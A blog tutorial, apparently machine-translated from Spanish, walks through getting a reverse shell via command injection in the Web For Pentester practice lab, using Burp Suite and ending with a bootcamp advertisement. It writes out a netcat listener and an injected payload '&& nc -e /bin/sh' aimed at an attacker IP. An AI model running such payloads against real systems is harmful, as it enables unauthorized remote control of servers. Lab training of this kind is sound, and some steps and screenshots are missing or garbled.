26 julio, 2024

Reverse shell via command injection

¿Do you know how to execute a reverse shell via command injection in a web hacking practice environment?

The following tutorial on how to run a reverse shell via command injection is made for educational purposes. The purpose of the technique that we will see below is to understand how an attacker acts when exploiting a critical vulnerability in a website.

Code injection is the third most used web cyberattack, according to the OWASP Top 10 list. Command injection is a type of attack that allows Linux bash commands to be executed and, in this way, extract information or take control of the application server.

In this post, We will see how to execute a reverse shell via command injection in a web hacking practice environment called Web For Pentester. But first, we will review some concepts necessary to perform this exercise.

Reverse shell via command injection

Before delving into the tutorial how to run a reverse shell via command injectionwe will review the concepts of forward shell and reverse shell, how they differ and which one we should choose when performing a penetration test.

A direct shell is a command terminal that connects from the attacker’s machine to the victim.. A reverse shell, on the other hand, causes the compromised computer to connect to the hacker’s computer.

Reverse shells or reverse shells They are preferable when carrying out cyber attackssince they allow us to avoid the presence of firewalls and other protective measures. Therefore, in this exercise, we will execute a reverse shell with the Netcat program.

Preparation

Create or open a virtual machine with the latest version of Kali Linux.
Create or open a virtual machine from the Web For ISO image Pentesterby PentesterLab.
Find out the IP address of your machine with Web For Pentester by running the “ifconfig” command in your terminal. Now, Open your virtual machine with Kali and enter the Burp Suite program, which comes preinstalled in the operating system. There, go to the Proxy tab and click on the «Open browser«. In the Burp Suite browser, access the IP address of the Web For Pentester virtual machine. You will see the following page:

Stroke

To make the attack reverse shell via command injection, enter the link that says «Example 1«, from the section «Command injection«. The link will take you to the following page:

Now, open the Burp Suite window and activate the «Intercept is on«. Once you’ve done this, open a Kali terminal and listen to a port with the command:

nc-lvp 4444

After listening on port 4444, return to the browser window and modify the page URL. To concatenate Linux commands, we will use » && «, with spaces, at the end of the URL, followed by the code to execute.

To run our payload and create a reverse shell that connects from the page server to our Kali virtual machine, we will run the following command at the end of the original URL of the site:

nc -e /bin/sh

That is to say, he payload from our example It would look like this:

&& nc -e /bin/sh 192.168.175.128 4444

When you have configured your payload press enter and go to the Burp Suite window. Right click on the intercepted request and select the “Send to repeater” option. There, you will have to modify the request to be able to access the reverse shell via command injection. Go to tab repeaterright click on the request and select the option «URL-encode as you type«.

Now, rewrite the payload in the header of the request so that it looks like this:

You will notice that the spaces have been changed to «+» symbols and the «&» symbols have been changed to the value «%26». This means that the payload has been encoded correctly and can be executed. Therefore, press the button «Send» to send the request.

Proof that you have already executed a reverse shell It will be, In the Kali terminal with Netcat, you will see the following message after submitting the request:

So, you will be able to execute any command on the web application serverfor example:

How to learn more?

We have already seen how to execute a reverse shell via command injection. If you want to learn more web hacking techniquesenter our Cybersecurity Full Stack Bootcamp and discover how to specialize in just 7 months. Ask for more information and discover how to change your life!

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *